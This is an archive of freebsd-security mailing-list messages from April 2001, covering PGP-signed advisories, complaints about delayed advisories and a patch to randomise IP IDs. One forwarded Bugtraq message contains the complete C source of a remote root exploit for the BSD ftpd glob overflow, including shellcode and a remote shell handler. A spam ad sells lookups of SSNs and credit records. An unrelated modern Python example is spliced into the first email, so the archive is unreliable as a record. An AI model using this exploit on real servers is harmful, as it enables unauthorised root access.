From owner-freebsd-security Sun Apr 15 20:08:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gamma.shell-station.com (gamma.shell-station.com [65.195.31.130]) by hub.freebsd.org (Postfix) with ESMTP id 13D5837B423 for ; Sun, 15 Apr 2001 20:08:17 -0700 (PDT) (envelope-from idem@idemnia.net)
Received: from HSE-QuebecCity-ppp81832.qc.sympatico.ca (idem@HSE-QuebecCity-ppp81832.qc.sympatico.ca [64.229.237.243]) by gamma.shell-station.com (8.11.3/8.9.3) with ESMTP id f3G37mu16525; Sun, 15 Apr 2001 20:07:49 -0700 (PDT) (envelope-from idem@idemnia.net)
Date: Sun, 15 Apr 2001 23:08:18 -0400 (EDT)
From: Félix-Antoine Paradis
X-X-Sender:
To: Chris Byrnes
Cc: Will Andrews ,
Subject: RE: PGP signed SAs.
In-Reply-To:
Message-ID: <20010415230756.H12289-100000@idemnia.ath.cx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > I'm using the Windows PGP client, and yes.
> >
> > Maybe windows dinked with the EOL? That would affect verification.
>
> Not sure. I deleted the key I had saved, and reimported it from the key
> server, and still the same message.
>
> Perhaps someone has a clue? I don't.

Try to get it from the FreeBSD website... it works for me...
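The exchange above blames a line-ending change by the Windows client for a failed verification of a signed advisory. As an added illustration (not from the thread, and not a real OpenPGP verifier), the block below uses a SHA-256 digest as a stand-in for the signature check so it runs offline: a check over raw bytes breaks as soon as LF becomes CRLF, while canonicalising the text the way OpenPGP cleartext signatures do (CRLF line endings, trailing whitespace removed) makes the same advisory hash identically on both platforms. The advisory text is a constructed sample.

```python
"""Line-ending canonicalisation before checking a signed text.

Added example, not part of the original thread. The digest comparison
stands in for the real OpenPGP signature check so the point can be shown
offline; the rule applied is the OpenPGP cleartext-signature convention
(hash over lines with CRLF endings and trailing whitespace removed)."""
import hashlib


def canonicalize(text: bytes) -> bytes:
    """Normalise CRLF, bare CR and bare LF to CRLF and drop trailing
    whitespace on every line, so the same advisory hashes identically
    whether it was saved on Windows or on Unix."""
    unified = text.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    lines = [line.rstrip(b" \t") for line in unified.split(b"\n")]
    return b"\r\n".join(lines)


def raw_digest(text: bytes) -> str:
    """Digest over the bytes exactly as received (fragile under EOL changes)."""
    return hashlib.sha256(text).hexdigest()


def canonical_digest(text: bytes) -> str:
    """Digest over the canonical form (what a cleartext verifier should hash)."""
    return hashlib.sha256(canonicalize(text)).hexdigest()


def verify(text: bytes, expected_digest: str, canonical: bool) -> bool:
    """Compare the message against the digest the signer published.
    With canonical=False the comparison is over raw bytes and a mailer's
    EOL conversion breaks it; with canonical=True it survives."""
    digest = canonical_digest(text) if canonical else raw_digest(text)
    return digest == expected_digest


# Constructed sample: the advisory as the signer wrote it on Unix ...
ADVISORY_LF = b"FreeBSD Security Advisory (constructed sample)\nTopic: example only\n"
# ... and the same text after a Windows client rewrote the line endings
ADVISORY_CRLF = ADVISORY_LF.replace(b"\n", b"\r\n")

# The digest the signer "published", computed over the canonical form
PUBLISHED_DIGEST = canonical_digest(ADVISORY_LF)


if __name__ == "__main__":
    print("raw-byte check after EOL change:  ",
          verify(ADVISORY_CRLF, raw_digest(ADVISORY_LF), canonical=False))
    print("canonical check after EOL change: ",
          verify(ADVISORY_CRLF, PUBLISHED_DIGEST, canonical=True))
```

The practical check when a clearsigned advisory fails to verify on one platform only: save the message as received, normalise its line endings, and verify again before concluding the key or the signature is bad.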
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 15 21: 7:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from dns1.tennex.co.jp (dns1.tennex.co.jp [210.169.158.19]) by hub.freebsd.org (Postfix) with ESMTP id 0B07837B422 for ; Sun, 15 Apr 2001 21:07:38 -0700 (PDT) (envelope-from kingkong.here.in@newyorkcity.com) Received: from svb210.tennex.co.jp (t-navi.tennex.co.jp [210.169.158.22]) by dns1.tennex.co.jp (8.9.3/3.7W) with ESMTP id NAA15486; Mon, 16 Apr 2001 13:00:34 +0900 Received: from yahoo.com ([38.29.222.227]) by svb210.tennex.co.jp (Lotus Domino Release 5.0.4a) with SMTP id 2001041612594635:478 ; Mon, 16 Apr 2001 12:59:46 +0900 From: landafo@jahoopa.com Subject: All new! - Get the inside scoop on Anyone or Anything! X-Mailer: Mozilla 4.61 [en] (Win95; I) Message-Id: <7fu86t.ptk7gk4wiv2g564@yahoo.com> Date: Sun, 15 Apr 2001 19:01:49 -0100 To: greenihl@ireland.com X-MIMETrack: Itemize by SMTP Server on svb210/Global1(Release 5.0.4a |July 24, 2000) at 2001/04/16 01:00:13 PM, Serialize by Router on svb210/Global1(Release 5.0.4a |July 24, 2000) at 2001/04/16 01:00:14 PM MIME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Internet Investigator

New for 2001
Internet Software Program for Online Investigations

- Find Out Anything about Anyone Online -

Uncover Information about: neighbors, enemies, friends, debtors, employees, your boss,
yourself, relatives, former school or military buddies, even a new love interest!

Become an "Internet Investigator™" and explore an exciting new world
of valuable information.

With Internet Investigator™ You Can Investigate:

People, credit records, social security numbers, employment records, school records, criminal records, driving records, addresses, phone numbers (even some unlisted), hidden assets,
family trees
and a whole lot more!

Click Here for more Information

All requests to be taken off our mailing list are AUTOMATICALLY and IMMEDIATELY honored upon receipt.
Click here to be taken off our list.

Each year in the U.S. alone, the "postal" bulk mail industry consumes over 450 million trees just to make the paper used in sending their advertisements and promotions. Using email instead can significantly reduce this consumption, while at the same time decreasing the billions of tons of paper waste filling our landfills.
Save the trees, save the planet, use email!

From owner-freebsd-security Sun Apr 15 22:23:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 5778A37B423 for ; Sun, 15 Apr 2001 22:23:19 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from [127.0.0.1] (helo=softweyr.com ident=e62c62b4fb3fff12be1c969f1fbfb626) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14p1So-0000LP-00; Sun, 15 Apr 2001 23:22:14 -0600
Message-ID: <3ADA8186.FB33DBC9@softweyr.com>
Date: Sun, 15 Apr 2001 23:22:14 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Stanley Hopcroft
Cc: freebsd-security@freebsd.org
Subject: Re: Security Announcements?
References: <20010410215014.A8173@scientia.demon.co.uk> <20010411094026.B80253@IPAustralia.Gov.AU>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Stanley Hopcroft wrote:
> On Tue, Apr 10, 2001 at 03:43:47PM -0700, Nicole Harrington wrote:
> >
> > From my perspective it took days for people to stop discussing what patch
> > was best for ntpd and I still never heard a full resolution on the mailing
> > list. No official blessing of a patch other than what I would get via CVSUP. I
> > have production servers, I can't run a CVsup everyday, let alone a make world.
>
> Here here. I have shut down ntpd. I can't determine from the debate
> about the ntp patch what I should use. There is no SA ....

It would be important at this point not to confuse "There is no SA" with
"I can't pull my head far enough out of my haunches to find the SA":

http://www.FreeBSD.org/cgi/getmsg.cgi?fetch=334860+341475+/usr/local/www/db/text/2001/freebsd-security/20010415.freebsd-security

That took all of ONE SEARCH, searching in the obvious "security" mailing
list, to locate.

> > Yes I may have missed a few mails or something. But expecting people to spend
> > their days tracking down patches and notices abt problems kinda negates the
> > whole idea of a security mailing and notification.
>
> Yes.

If I found it in the security archives, it must have gone out on the
security mailing list. In fact, I even see where I forwarded it to work,
so we could evaluate the version of ntp we use there, when I originally
received it on the security mailing list. So what we're all kvetching
about here is failing to read, or even notice, a security alert that was
sent out?

What do you want? If you want to pay some money for security support, we
can probably send Albert and Bill around the world with a baseball bat to
beat you over the head every time a security alert is issued, just to make
sure you don't miss it.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                     Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/

From owner-freebsd-security Sun Apr 15 23:34:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from entropy.inserted.net (async2-win-isp-1.nas.one.net.au [61.12.142.3]) by hub.freebsd.org (Postfix) with SMTP id 9D09337B42C for ; Sun, 15 Apr 2001 23:34:06 -0700 (PDT) (envelope-from steve@inserted.net)
Received: (qmail 77801 invoked from network); 16 Apr 2001 06:11:36 -0000
Received: from fortune.inserted.net (HELO fortune) (192.168.0.2) by entropy.inserted.net with SMTP; 16 Apr 2001 06:11:36 -0000
Date: Mon, 16 Apr 2001 16:13:32 -0700
From: Stephen Ware
X-Mailer: The Bat! (v1.51) Personal
Reply-To: Stephen Ware
X-Priority: 3 (Normal)
Message-ID: <133241393555.20010416161332@inserted.net>
To: Wes Peters
Cc: Stanley Hopcroft , freebsd-security@freebsd.org
Subject: Re[2]: Security Announcements?
In-Reply-To: <3ADA8186.FB33DBC9@softweyr.com>
References: <20010410215014.A8173@scientia.demon.co.uk> <20010411094026.B80253@IPAustralia.Gov.AU> <3ADA8186.FB33DBC9@softweyr.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Sunday, April 15, 2001, 10:22:14 PM, Wes Peters wrote:

>> On Tue, Apr 10, 2001 at 03:43:47PM -0700, Nicole Harrington wrote:
           ^^^^^^
Note the date of the question about the lack of SA.

WP> It would be important at this point not to confuse "There is no SA" with
WP> "I can't pull my head far enough out of my haunches to find the SA":

Or, perhaps it's a case of "I don't know which day comes first." Take a
closer look at the date the SA was released to the mailing lists, and ask
yourself how Ms Harrington was to search for a message that isn't going
to be created for 2 days.

I think this thread is dead.

--
Best regards,
Stephen                            mailto:steve@inserted.net

From owner-freebsd-security Sun Apr 15 23:53:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from redlance.singingtree.com (pool.207.151.148.221.cinenet.net [207.151.148.221]) by hub.freebsd.org (Postfix) with ESMTP id BFE6737B424 for ; Sun, 15 Apr 2001 23:52:57 -0700 (PDT) (envelope-from mikey@singingtree.com)
Received: from localhost (mikey@localhost) by redlance.singingtree.com (8.11.3/8.11.2) with ESMTP id f3G6qsK32610 for ; Sun, 15 Apr 2001 23:52:56 -0700 (PDT) (envelope-from mikey@singingtree.com)
Date: Sun, 15 Apr 2001 23:52:54 -0700 (PDT)
From: "Michael A. Dickerson"
To: freebsd-security@freebsd.org
Subject: Re: Security Announcements?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Wes Peters wrote:
> So what we're all kvetching about here is failing to read, or
> even notice, a security alert that was sent out? What do you want?
> If you want to pay some money for security support, we can probably
> send Albert and Bill around the world with a baseball bat to beat
> you over the head every time a security alert is issued, just to
> make sure you don't miss it.

Uh, no. Notice the date on the security advisory, which was more than
one week after the bug was publicly announced, and a patch made
available. That's what people were worried about.

Now, Kris has since explained that he was out of town. That's bound to
happen sometimes, unless someone starts chaining the (volunteer)
security officer to his computer. However, the fact that the advisories
are sometimes delayed is still a problem for some people. For instance,
I might be unable to read -stable for a few days, but I have a perl
script that pages me when advisories are issued. Obviously, I can't rely
on that mechanism if advisories come out long after bugs are announced
in other public forums. And who knows how many people only subscribe to
freebsd-security-notifications and think they're safe for it?

M.D.

From owner-freebsd-security Mon Apr 16 02:03:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-139.dsl.lsan03.pacbell.net [63.207.60.139]) by hub.freebsd.org (Postfix) with ESMTP id DC9B537B422; Mon, 16 Apr 2001 02:03:15 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C6CB866D8B; Mon, 16 Apr 2001 02:03:11 -0700 (PDT)
Date: Mon, 16 Apr 2001 02:03:11 -0700
From: Kris Kennaway
To: Mike Silbersack
Cc: Mark T Roberts , freebsd-security@FreeBSD.ORG, net@FreeBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010416020311.A1292@xor.obsecurity.org>
References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="fdj2RfSjLxBAspz7"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from silby@silby.com on Thu, Apr 12, 2001 at 12:40:32AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--fdj2RfSjLxBAspz7
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Thu, Apr 12, 2001 at 12:40:32AM -0500, Mike Silbersack wrote:
> Each IP packet sent has with it a 16-bit ID. The numbers must remain
> unique over a short period of time so fragmentation can work properly. As
> such, everything except recent openbsds simple increments the id by 1 for
> each packet sent out.
>
> As a result, you can tell the number of packets sent on an idle host by
> seeing the difference in id numbers for the packets it sends back to you.
> It's not really that important of an issue, don't worry about it.

Here's a patch ported from OpenBSD which randomizes this (supposedly
such that it respects the constraint of not wrapping within the
prescribed time period). I should wrap it in a sysctl, I guess.

http://www.freebsd.org/~kris/ipid.patch

Comments?

Kris

--fdj2RfSjLxBAspz7
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE62rVOWry0BWjoQKURAmEnAKCPsC4cKouTayuBqji58oWOUH22DACdF7A0
3Is0lLB0DmTyUzAHsY6q/rU=
=WMzk
-----END PGP SIGNATURE-----

--fdj2RfSjLxBAspz7--

From owner-freebsd-security Mon Apr 16 02:16:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw2.dnepr.net (CoreGW2-TBone.dnepr.net [195.24.156.97]) by hub.freebsd.org (Postfix) with ESMTP id 9CBDD37B42C for ; Mon, 16 Apr 2001 02:16:03 -0700 (PDT) (envelope-from land@dnepr.net)
Received: from dnepr.net (dnepr.net [195.24.156.98]) by gw2.dnepr.net (8.8.8/8.6.18/01) with ESMTP id MAA23530 for ; Mon, 16 Apr 2001 12:16:07 +0300 (EET DST)
From: land@dnepr.net
Received: (from land@localhost) by dnepr.net (8.8.8/8.8.8) id MAA12705 for security@freebsd.org; Mon, 16 Apr 2001 12:16:07 +0300 (EEST)
X-POP3-RCPT: security@freebsd.org
Date: Mon, 16 Apr 2001 12:16:07 +0300
To: security@freebsd.org
Subject: (fwd) Remote BSD ftpd glob exploit
Message-ID: <20010416121606.A11997@dnepr.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Does exploit work on 4.1-RELEASE or 4-STABLE ?

----- Forwarded message from fish stiqz -----
From: fish stiqz Subject: Remote BSD ftpd glob exploit To: BUGTRAQ@SECURITYFOCUS.COM Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com User-Agent: Mutt/1.2.5i Date: Sat, 14 Apr 2001 16:41:43 -0400 Reply-To: fish stiqz Hello, Here is a remote exploit for the glob bug discussed earlier here. It works on FreeBSD 4.0-RELEASE, and with the right address, should work on others as well. It requires a user account in a non-chrooted environment (normal user account). If anyone gets this working on other systems, let me know. Take care, have a good weekend. - fish stiqz. -- fish stiqz irc>irl?werd():lame() /* * turkey.c - "gobble gobble" * * REMOTE ROOT EXPLOIT FOR BSD FTPD * by: fish stiqz 04/13/2001 * * shouts: trey, dono and irc.analog.org. * German_gu (whats up? =). * * Notes: * Doesn't break chroot, requires an account. * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define FTP_PORT 21 #define MAXX(a,b) ((a) < (b) ? (b) : (a)) #define NOP 0x41 /* inc %ecx, works just like a nop, easier to read */ extern int errno; int debug_read; int debug_write; /* * Non-ripped 45 byte bsd shellcode which does setuid(0) and execve() * and does not contain any '/' characters. */ char bsdcode[] = "\x29\xc0\x50\xb0\x17\x50\xcd\x80" "\x29\xc0\x50\xbf\x66\x69\x73\x68" "\x29\xf6\x66\xbe\x49\x46\x31\xfe" "\x56\xbe\x49\x0b\x1a\x06\x31\xfe" "\x56\x89\xe3\x50\x54\x50\x54\x53" "\xb0\x3b\x50\xcd\x80"; /* architecture structure */ struct arch { char *description; char *shellcode; unsigned long code_addr; }; /* available targets */ struct arch archlist[] = { { "FreeBSD 4.0-RELEASE (FTP server (Version 6.00LS))", bsdcode, 0xbfbfc2a8 } }; /* * function prototypes. 
*/ void *Malloc(size_t); void *Realloc(void *, size_t); char *Strdup(char *); int get_ip(struct in_addr *, char *); int tcp_connect(char *, unsigned int); ssize_t write_sock(int, void *, size_t); ssize_t read_sock(int, void *, size_t); int ftp_login(int, char *, char *); char *ftp_gethomedir(int); int ftp_mkdir(int, char *); int ftp_chdir(int, char *); int ftp_quit(int); void possibly_rooted(int); void send_glob(int, char *); char *random_string(void); int ftp_glob_exploit(int, char *, unsigned long, char *); int verify_shellcode(char *); void usage(char *); void list_targets(void); /* * Error cheq'n wrapper for malloc. */ void *Malloc(size_t n) { void *tmp; if((tmp = malloc(n)) == NULL) { fprintf(stderr, "malloc(%u) failed! exiting...\n", n); exit(EXIT_FAILURE); } return tmp; } /* * Error cheq'n strdup. */ char *Strdup(char *str) { char *s; if((s = strdup(str)) == NULL) { fprintf(stderr, "strdup failed! exiting...\n"); exit(EXIT_FAILURE); } return s; } /* * translates a host from its string representation (either in numbers * and dots notation or hostname format) into its binary ip address * and stores it in the in_addr struct passed in. * * return values: 0 on success, != 0 on failure. */ int get_ip(struct in_addr *iaddr, char *host) { struct hostent *hp; /* first check to see if its in num-dot format */ if(inet_aton(host, iaddr) != 0) return 0; /* next, do a gethostbyname */ if((hp = gethostbyname(host)) != NULL) { if(hp->h_addr_list != NULL) { memcpy(&iaddr->s_addr, *hp->h_addr_list, sizeof(iaddr->s_addr)); return 0; } return -1; } return -1; } /* * initiates a tcp connection to the specified host (either in * ip format (xxx.xxx.xxx.xxx) or as a hostname (microsoft.com) * to the host's tcp port. * * return values: != -1 on success, -1 on failure. 
*/ int tcp_connect(char *host, unsigned int port) { int sock; struct sockaddr_in saddress; struct in_addr *iaddr; iaddr = Malloc(sizeof(struct in_addr)); /* write the hostname information into the in_addr structure */ if(get_ip(iaddr, host) != 0) return -1; saddress.sin_addr.s_addr = iaddr->s_addr; saddress.sin_family = AF_INET; saddress.sin_port = htons(port); /* create the socket */ if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) return -1; /* make the connection */ if(connect(sock, (struct sockaddr *) &saddress, sizeof(saddress)) != 0) { close(sock); return -1; } /* everything succeeded, return the connected socket */ return sock; } /* * a wrapper for write to enable us to do some debugging. */ ssize_t write_sock(int fd, void *buf, size_t count) { unsigned int i; if(debug_write == 1) { printf(" > "); for(i = 0; i < count; i++) printf("%c", ((char *)buf)[i]); fflush(stdout); } return write(fd, buf, count); } /* * a wrapper for read to enable us to some debugging. */ ssize_t read_sock(int fd, void *buf, size_t count) { unsigned int i; ssize_t r; r = read(fd, buf, count); if(debug_read == 1) { printf(" < "); for(i = 0; i < r; i++) printf("%c", ((char *)buf)[i]); fflush(stdout); } return r; } /* * FTP LOGIN function. Issues a "USER and then "PASS " * to login to the remote host and checks that command succeeded. */ int ftp_login(int sock, char *username, char *password) { char recvbuf[256]; char *sendbuf; int r; /* get the header */ read_sock(sock, recvbuf, 255); sendbuf = Malloc((MAXX(strlen(username), strlen(password)) + 7) * sizeof(char)); sprintf(sendbuf, "USER %s\n", username); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; if(atoi(recvbuf) != 331) return 0; sprintf(sendbuf, "PASS %s\n", password); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; free(sendbuf); if(atoi(recvbuf) == 230) return 1; return 0; } /* * FTP GET HOME DIR function. 
Issues a "CWD ~" and "PWD" to * force the ftp daemon to print our our current directory. */ char *ftp_gethomedir(int sock) { char recvbuf[256]; char *homedir = NULL; int r; write_sock(sock, "CWD ~\n", 6); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; if(atoi(recvbuf) == 250) { write_sock(sock, "PWD\n", 4); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; if(atoi(recvbuf) == 257) { char *front, *back; front = strchr(recvbuf, '"'); front++; back = strchr(front, '"'); homedir = Malloc((back - front) * sizeof(char)); strncpy(homedir, front, (back - front)); homedir[(back - front)] = 0x0; } } return homedir; } /* * FTP MKDIR function. Issues an "MKD " to create a directory on * the remote host and checks that the command succeeded. */ int ftp_mkdir(int sock, char *dirname) { char recvbuf[512]; char *sendbuf; int r; sendbuf = Malloc((strlen(dirname) + 6) * sizeof(char)); sprintf(sendbuf, "MKD %s\n", dirname); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 511); recvbuf[r] = 0x0; free(sendbuf); if(atoi(recvbuf) == 257) return 1; return 0; } /* * FTP CWD function. Issues a "CWD " to change directory on * the remote host and checks that the command succeeded. */ int ftp_chdir(int sock, char *dirname) { char recvbuf[512]; char *sendbuf; int r; sendbuf = Malloc((strlen(dirname) + 6) * sizeof(char)); sprintf(sendbuf, "CWD %s\n", dirname); write_sock(sock, sendbuf, strlen(sendbuf)); r = read_sock(sock, recvbuf, 511); recvbuf[r] = 0x0; free(sendbuf); if(atoi(recvbuf) == 250) return 1; return 0; } /* * FTP QUIT function. Issues a "QUIT" to terminate the connection. */ int ftp_quit(int sock) { char recvbuf[256]; int r; write_sock(sock, "QUIT\n", 5); r = read_sock(sock, recvbuf, 255); recvbuf[r] = 0x0; close(sock); return 1; } /* * switches between the user and the remote shell (if everything went well). 
*/ void possible_shell(int sock) { char banner[] = "cd /; echo; uname -a; echo; id; echo; echo Welcome to the shell, " "enter commands at will; echo;\n\n"; char buf[1024]; fd_set fds; int r; write(sock, banner, strlen(banner)); for(;;) { FD_ZERO(&fds); FD_SET(fileno(stdin), &fds); FD_SET(sock, &fds); select(255, &fds, NULL, NULL, NULL); if(FD_ISSET(sock, &fds)) { memset(buf, 0x0, sizeof(buf)); r = read (sock, buf, sizeof(buf) - 1); if(r <= 0) { printf("Connection closed.\n"); exit(EXIT_SUCCESS); } printf("%s", buf); } if(FD_ISSET(fileno(stdin), &fds)) { memset(buf, 0x0, sizeof(buf)); read(fileno(stdin), buf, sizeof(buf) - 1); write(sock, buf, strlen(buf)); } } close(sock); } /* * generates a string of 6 random characters. * this is too allow for multiple successful runs, best way to do * this is to actually remove the created directories. */ char *random_string(void) { int i; char *s = Malloc(7); srand(time(NULL)); for(i = 0; i < 6; i++) s[i] = (rand() % (122 - 97)) + 97; s[i] = 0x0; return s; } /* * sends the glob string, to overflow the daemon. */ void send_glob(int sock, char *front) { char globbed[] = "CWD ~/NNNNNN*/X*/X*/X*\n"; int i, j; for(i = 6, j = 0; i < 6 + 6; i++, j++) globbed[i] = front[j]; write_sock(sock, globbed, strlen(globbed)); printf("[5] Globbed commands sent.\n"); /* start our shell handler */ possible_shell(sock); } /* * Exploitation routine. * Makes 4 large directories and then cwd's to them. 
*/ int ftp_glob_exploit(int sock, char *homedir, unsigned long addy, char *shellcode) { char dir[300]; int i, j; int total = strlen(homedir) + 1; int align2; char *rstring = random_string(); /* go to the writeable directory */ if(!ftp_chdir(sock, homedir)) { fprintf(stderr, "[-] Failed to change directory, aborting!\n"); return 0; } for(i = 0; i < 4; i++) { memset(dir, 0x0, 299); switch(i) { case 0: /* first dir == shellcode */ memcpy(dir, rstring, strlen(rstring)); memset(dir + strlen(rstring), NOP, 255 - strlen(rstring)); strcpy(&dir[(255 - strlen(shellcode))], shellcode); break; case 3: /* address buffer */ /* calculate the alignment */ align2 = total % sizeof(long); align2 = sizeof(long) - align2; printf("[3] Calculated alignment = %d, total = %d\n", align2, total); strcpy(dir, "XXXX"); memset(dir + 4, 'X', align2); for(j = 4 + align2; j < 250; j += 4) *(unsigned long *)(&dir[j]) = addy; break; default: /* cases 1 and 2, extra overflow bytes */ memset(dir, 'X', 255); break; } total += strlen(dir) + 1; if(!ftp_mkdir(sock, dir)) { fprintf(stderr, "[-] Failed to generate directories, aborting!\n"); return 0; } if(!ftp_chdir(sock, dir)) { fprintf(stderr, "[-] Failed to change directory, aborting!\n"); return 0; } } printf("[4] Evil directories created.\n"); if(!ftp_chdir(sock, homedir)) { fprintf(stderr, "[-] Failed to cwd back to %s, aborting!\n", homedir); return 0; } /* perform the final attack */ send_glob(sock, rstring); return 1; } /* * returns true if the shellcode passes, false otherwise. */ int verify_shellcode(char *code) { int i, s = 0; if(strlen(code) > 255) { fprintf(stderr, "[-] Shellcode length exceeds 255, aborting!\n"); return 0; } for(i = 0; i < strlen(code); i++) { if(code[i] == '/') s++; } if(s > 0) { fprintf(stderr, "[-] Shellcode contains %u slash characters, aborting\n", s); return 0; } return 1; } /* * displays the usage message and exits. 
*/ void usage(char *p) { fprintf(stderr, "BSD ftpd remote exploit by fish stiqz \n" "usage: %s [options]\n" "\t-c\tremote host to connect to\n" "\t-o\tremote port to use\n" "\t-u\tremote username\n" "\t-p\tremote password\n" "\t-i\tget the password interactively\n" "\t-t\tpredefined target (\"-t list\" to list all targets)\n" "\t-d\twriteable directory\n" "\t-l\tshellcode address\n" "\t-v\tdebug level [0-2]\n" "\t-s\tseconds to sleep after login (debugging purposes)\n" "\t-h\tdisplay this help\n", p); exit(EXIT_FAILURE); } /* * lists all available targets. */ void list_targets(void) { int i; printf("Available Targets:\n"); for(i = 0; i < sizeof(archlist) / sizeof(struct arch); i++ ) printf("%i: %s\n", i, archlist[i].description); return; } int main(int argc, char **argv) { int sock, c; int port = FTP_PORT; int debuglevel = 0; char *host = NULL; char *username = NULL; char *password = NULL; struct arch *arch = NULL; char *shellcode = bsdcode; int target = 0; int sleep_time = 0; unsigned long code_addr = 0; char *homedir = NULL;; /* grab command line parameters */ while((c = getopt(argc, argv, "c:o:u:p:it:d:l:v:s:h")) != EOF) { switch(c) { case 'c': host = Strdup(optarg); break; case 'o': port = atoi(optarg); break; case 'u': username = Strdup(optarg); break; case 'p': password = Strdup(optarg); /* hide the password from ps */ memset(optarg, 'X', strlen(optarg)); break; case 'i': password = getpass("Enter remote password: "); break; case 't': if(strcmp(optarg, "list") == 0) { list_targets(); return EXIT_FAILURE; } target = atoi(optarg); arch = &(archlist[target]); code_addr = arch->code_addr; shellcode = arch->shellcode; break; case 'd': homedir = Strdup(optarg); break; case 'l': code_addr = strtoul(optarg, NULL, 0); break; case 'v': debuglevel = atoi(optarg); break; case 's': sleep_time = atoi(optarg); break; default: usage(argv[0]); break; } } /* check for required options */ if(host == NULL || username == NULL || password == NULL || code_addr == 0) usage(argv[0]); 
/* setup the debug level */ switch(debuglevel) { case 1: debug_read = 1; debug_write = 0; break; case 2: debug_read = 1; debug_write = 1; break; default: debug_read = 0; debug_write = 0; break; } /* make sure the shellcode is good */ if(!verify_shellcode(shellcode)) return EXIT_FAILURE; /* initiate the tcp connection to the ftp server */ if((sock = tcp_connect(host, port)) == -1) { fprintf(stderr, "[-] Connection to %s failed!\n", host); ftp_quit(sock); return EXIT_FAILURE; } if(arch == NULL) printf("[0] Connected to host %s.\n", host); else printf("[0] Connected to host %s\n\tAs type %s.\n", host, arch->description); /* login */ if(!ftp_login(sock, username, password)) { fprintf(stderr, "[-] Login failed, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } /* hey, so im anal! */ memset(password, 0x0, strlen(password)); free(username); free(password); printf("[1] Login succeeded.\n"); if(sleep != 0) sleep(sleep_time); if(homedir == NULL) { /* get home directory */ if((homedir = ftp_gethomedir(sock)) == NULL) { fprintf(stderr, "[-] Couldn't retrieve home directory, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } } printf("[2] Home directory retrieved as \"%s\", %u bytes.\n", homedir, strlen(homedir)); /* do the exploitation */ if(!ftp_glob_exploit(sock, homedir, code_addr, shellcode)) { fprintf(stderr, "[-] exploit failed, aborting!\n"); ftp_quit(sock); return EXIT_FAILURE; } ftp_quit(sock); free(host); return EXIT_SUCCESS; } ----- End forwarded message ----- -- Best regards, Andrey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 2:27:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.96.18]) by hub.freebsd.org (Postfix) with SMTP id BC72037B449 for ; Mon, 16 Apr 2001 02:27:09 -0700 (PDT) (envelope-from venglin@freebsd.lublin.pl) Received: (qmail 35487 invoked from network); 16 Apr 2001 09:27:02 
